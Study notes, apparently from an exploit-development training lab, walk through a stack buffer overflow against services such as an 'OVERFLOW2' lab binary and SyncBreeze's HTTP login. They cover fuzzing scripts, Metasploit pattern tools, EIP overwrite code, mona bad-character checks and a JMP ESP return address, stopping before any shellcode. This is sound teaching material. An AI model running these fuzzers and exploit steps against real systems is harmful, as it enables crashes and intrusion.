Restart ImmunityDbgr (Debug > Restart)- after every crash
This step will output approx no: of bytes when the crash occured.
#!/usr/bin/python
import sys, socket
from time import sleep
ip = "10.10.85.137"
port = 1337
prefix = "OVERFLOW2 "
buffer = "A" * 100
#timeout = 5
while True:
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# s.settimeout(timeout)
s.connect((ip, port))
s.recv(1024)
print "Fuzzing with %s bytes..." % str(len(buffer))
s.send((prefix + buffer))
s.recv(1024)
except:
print "Fuzzing crashed at %s bytes" % str(len(buffer))
sys.exit()
buffer = buffer + "A" * 100
sleep(1)
----------------------------------------------------------------------------------------
#!/usr/bin/python
import sys, socket
from time import sleep
ip = "10.10.85.137"
port = 31337
size = 100
#buffer = "A" * 100 + "\n"
#timeout = 5
while True:
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip, port))
buffer = "A" * size + "\n"
print "\nFuzzing with %s bytes..." % size
s.send(buffer)
s.close()
size+=100
sleep(3)
except:
print "Exited!! Fuzzing crashed at %s bytes" % size
sys.exit()
----------------
#HTTP Service:Syncbreeze
#!/usr/bin/python
import sys, socket
from time import sleep
ip = "192.168.174.10"
port = 80
buffer= "A" * 100
while True:
try:
content = "username=" + buffer + "&password=A"
req = "POST /login HTTP/1.1\r\n"
req+= "Host: 192.168.174.10\r\n"
req+= "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\r\n"
req+= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
req+= "Accept-Language: en-US,en;q=0.5\r\n"
req+= "Accept-Encoding: gzip, deflate\r\n"
req+= "Content-Type: application/x-www-form-urlencoded\r\n"
req+= "Content-Length: "+ str(len(content)) + "\r\n"
req+= "Origin: http://192.168.174.10\r\n"
req+= "Connection: close\r\n"
req+= "Referer: http://192.168.174.10/login\r\n"
req+= "Upgrade-Insecure-Requests: 1\r\n"
req+= "\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip, port))
print "Fuzzing with %s bytes..." % str(len(buffer))
s.send((req + content))
sleep(10)
buffer = buffer + "A" * 100
content = "username=" + buffer + "&password=A"
except:
print "Connection error! Fuzzing crashed at %s bytes" % str(len(buffer))
sys.exit()
Finding the Offset
Goal is to identify the value of the EIP > This helps identify the offset.
#Create pattern
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <No: of bytes from fuzz.py>
msf-pattern_create -l 2000
#Find_offset.py
#!/usr/bin/python
import sys, socket
ip = "10.10.85.137"
port = 1337
prefix ="OVERFLOW2 "
offset = "<Insert created pattern here>"
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip, port))
s.send((prefix + offset))
s.close()
except:
print "Error connecting to server"
sys.exit()
chmod +x findoffset.py; ./find_offset.py
Once crash occurs, take note of the value of the EIP register within Immunity Debugger.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <No: of bytes from fuzz.py> -q <Value of EIP register in Immunity Dbgr at crash>
msf-pattern_offset -q <Value of EIP register in Immunity Dbgr at crash>
This will show the exact offset value. This means there are those many bytes before you get to the EIP and then the EIP itself is 4 bytes long.
Over-writing the EIP
The goal is to over-write the 4 specific bytes of the EIP.
We confirm by writing upto offset and over-writing the EIP with 4 'B's [42424242]
#overwrite_eip.py
#!/usr/bin/python
import sys, socket
ip = "10.10.155.133"
port = 1337
prefix ="OVERFLOW2 "
offset= 634
shellcode = "A" * offset + "B" * 4
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip, port))
s.send((prefix + shellcode))
s.close()
except:
print "Error connecting to server"
sys.exit()
Finding Bad Characters
Generate a bytearray using mona, and note the location of the bytearray.bin file that is generated.
Make a note of the address to which the ESP register points [eg:0022F930] and use it in the following mona command:
Refer this guide on how to remove Bad_char with Mona.
!mona compare -f C:\mona\bytearray.bin -a <ESP value>
#Identify bad char and remove them from the python script above.
#Repeat for each bad character identified until all are removed.
#Generate a new byte array
!mona bytearray -b "\x00\<Identified bad char>" #No comma seperators
!mona compare -f C:\mona\oscp\bytearray.bin -a <new ESP value>
Finding a Jump Point
Goal is to identify locations in memory that won’t change addresses when we restart program that hold the instruction ‘JMP ESP’.
Potential Targets: DLL used by the vulnerable program that has no memory protections[eg:ASLR etc].
Use mona.py with ImmunityDbgr to help identify the appropriate DLL.
If we found any bad characters from the previous step, we could check the results for any bad characters. For example, if we found out from previous step that 0x62 was a bad character, we would have to use a different module because all these results include ‘0x62’.[Vuln server example]
!mona jmp -r esp -cpb "\x00"<Other bad char if any>"
---------Alternatively-----------
--Type within Immuntiy Dbgr > Left-Bottom - text box
!mona modules
--Look for DLLs without protections ("False")
--Find OPCode equivalent of a JUMP
--To find the OPCode equivalent of JMP ESP:
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
JMP ESP
#Find the return address for EIP
#Type within Immunity Dbgr > Left-Bottom - text box
!mona find -s "\xff\xe4" -m <Potentialfile.dll>
!mona find -s "\xff\xe4" -m <vulnservice.exe>
#This will output a few return addresses. We will need to test if these will get us to EIP breakpoint
-----------------------------------------------------------------------------------------
#Modify script to jump to pointer. Note enter in reverse[Little endian format for x86 arch] (Eg: 0x625011af > \xaf\x11\x50\x62\ )
#!/usr/bin/python
import sys, socket
ip = "10.10.223.90"
port = 1337
prefix ="OVERFLOW2 "
offset= 634
buffer = "A" * offset + "\xaf\x11\x50\x62"
try:
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip, port))
s.send((prefix + buffer))
s.close()
except:
print "Error connecting to server"
sys.exit()
Test if we reach the jump-point
Set breakpoint on the address by pressing F2.
Within ImmunityDbgr: Enter Expression to follow (Eg: 625011af ) > Hit 'F2', or:
bp 0x625011af
ImmunityDbgr: EIP should be at breakpoint if it ran successfully.